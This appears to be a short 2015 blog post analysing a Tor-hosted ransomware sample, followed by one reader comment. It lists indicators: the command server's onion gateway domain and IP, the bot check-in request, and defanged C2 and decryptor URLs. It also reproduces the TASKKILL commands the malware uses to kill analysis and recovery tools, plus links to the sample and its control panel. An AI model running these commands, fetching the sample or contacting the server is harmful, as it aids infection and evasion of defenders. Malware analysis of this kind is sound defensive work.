The Ransomware is hosted with Tor.
Domain Address Country
qbstdn6k7iivyki2.onion.direct 5.135.181.100 France
HTTP Requests :
5.135.181.100:80 (qbstdn6k7iivyki2.onion.direct) GET
/lending/bot.php?name=4m4qn8F4804DA9-83EC&kod=tFpJtvsF^lUPeqDDzAQnkOeFfH]zSstunSA[dotBceHrJvZpTz&pid=2
GET /lending/bot.php?name=4m4qn8F4804DA9-83EC&kod=tFpJtvsF^lUPeqDDzAQnkOeFfH]zSstunSA[dotBceHrJvZpTz&pid=2 HTTP/1.1 Host: qbstdn6k7iivyki2.onion.direct Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; Synapse) with decoded base64 artifacts: n*xN7 ZIC09_4-
Some Strings :
hxxp://qbstdn6k7iivyki2.onion.direct/chek.php?vname=
hxxp://qbstdn6k7iivyki2.onion.direct/lending/bot.php?name=
hxxp://qbstdn6k7iivyki2.onion.direct/lending/send.php?name=
hxxps://github.com/m0nk8/tor/blob/master/DecryptorMAX.exe?raw=true
hxxps://www.paypal-cash.com
TASKKILL /F /IM cmd.exe
TASKKILL /F /IM filemon.exe
TASKKILL /F /IM LordPE.exe
TASKKILL /F /IM msconfig.exe
TASKKILL /F /IM procexp.exe
TASKKILL /F /IM procexp64.exe
TASKKILL /F /IM procmon.exe
TASKKILL /F /IM regedit.exe
TASKKILL /F /IM regmon.exe
TASKKILL /F /IM rstrui.exe
TASKKILL /F /IM tcpview.exe
TASKKILL /F /IM wireshark.exe
Panel here : hxxp://qbstdn6k7iivyki2.onion/lending/
Here u can see what it does to ur pc if ur infected with :
Sample here : hxxp://lipetskrulit.com/svchost.exe
Hosting Infos :
http://whois.domaintools.com/5.135.181.100
Mike Olivera - November 6, 2015 at 6:59 pm
wow , perfect. but; how do you know the ip of a onion server? o.O
thanks